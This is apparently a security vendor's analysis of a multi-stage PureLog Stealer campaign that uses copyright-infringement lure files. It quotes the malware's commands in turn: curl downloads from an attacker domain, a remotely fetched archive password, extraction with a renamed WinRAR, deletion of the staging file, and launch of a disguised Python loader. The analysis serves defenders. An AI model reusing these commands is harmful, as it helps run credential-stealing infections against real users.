Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries
Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries
The infection begins when the victim manually executes a file disguised as a legal notice:
Dokumentation über Verstöße gegen Rechte des geistigen Eigentums.exe (translating to Documentation on Intellectual Property Rights Violations.exe)
This executable launches a command interpreter:
cmd.exe /c …
The attack depends entirely on user interaction, with no exploit or vulnerability being used at this stage.
To reduce suspicion, the malware immediately opens a decoy PDF, displaying a benign-looking document while malicious actions continue in the background.
start “” “._document.pdf”
The purpose of this document is to distract the user and create a sense of legitimacy with the performed actions.
The malware downloads an encrypted payload from an attacker-controlled infrastructure:
curl -A “curl/meow_meow” -s -k -L “https://quickdocshare.com/DQ” -o “._invoice.pdf”
Key technical details include:
- Custom User-Agent: curl/meow_meow
- -s (silent mode)
- -k (ignore TLS validation)
- -L (follow redirects)
- Saved locally as _invoice.pdf
While labelled as a PDF, the file is actually an encrypted archive container.
Instead of embedding the archive password in the malware, it is retrieved dynamically from a separate endpoint:
curl -A “curl/meow_meow” -s -k -L “https://quickdocshare.com/DQ/key”
The response from this request is captured into a command-line variable (%i) and used for extraction. The malware does not contain a static, hardcoded password, making offline analysis significantly more difficult. The attacker can rotate passwords on a per‑victim basis, ensuring that each infection can be uniquely controlled or invalidated.
This design also prevents analysts from extracting the payload without active network access to the attacker’s infrastructure. Overall, the approach establishes an infrastructure‑controlled decryption model that gives the operator full remote control over when and how the payload is unlocked.
A file masquerading as a PNG image is executed:
- _FILE_2025년_재직증명서_원본.png (translating to 2025 Employment Certificate – Original)
This file is actually a renamed WinRAR executable.
The extraction command:
“._FILE_2025년_재직증명서_원본.png” x -p”%i” “._invoice.pdf” “C:UsersPublic” -y
A more detailed explanation of the components used in this stage follows below:
- x → Extract archive
- -p”%i” → Use dynamically retrieved password
- Output → C:UsersPublic
- -y → Overwrite automatically
This stage decrypts and extracts the next payload using legitimate archive functionality.
After successful extraction, the encrypted container is removed:
del “._invoice.pdf”
This reduces forensic artifacts and removes the encrypted staging file.
The working directory is then changed to the following:
cd “C:UsersPublicWindows”
This location mimics a legitimate Windows directory structure to reduce suspicion from the user
During this stage, the extracted payload is executed:
“C:UsersPublicWindowssvchost.exe” “instructions.pdf”
The notable observations we identified during this stage include:
- The file svchost.exe is not the legitimate Windows component; it is a renamed python.exe used to execute Python scripts
- The file instructions.pdf is the obfuscated Python script used as the loader for two .NET executables.
We identified a second infection chain sharing the same core toolset as the originally documented one. This consists of four stages exhibiting material operational differences from the previous infection chain, which are detailed in the table below.
About Author
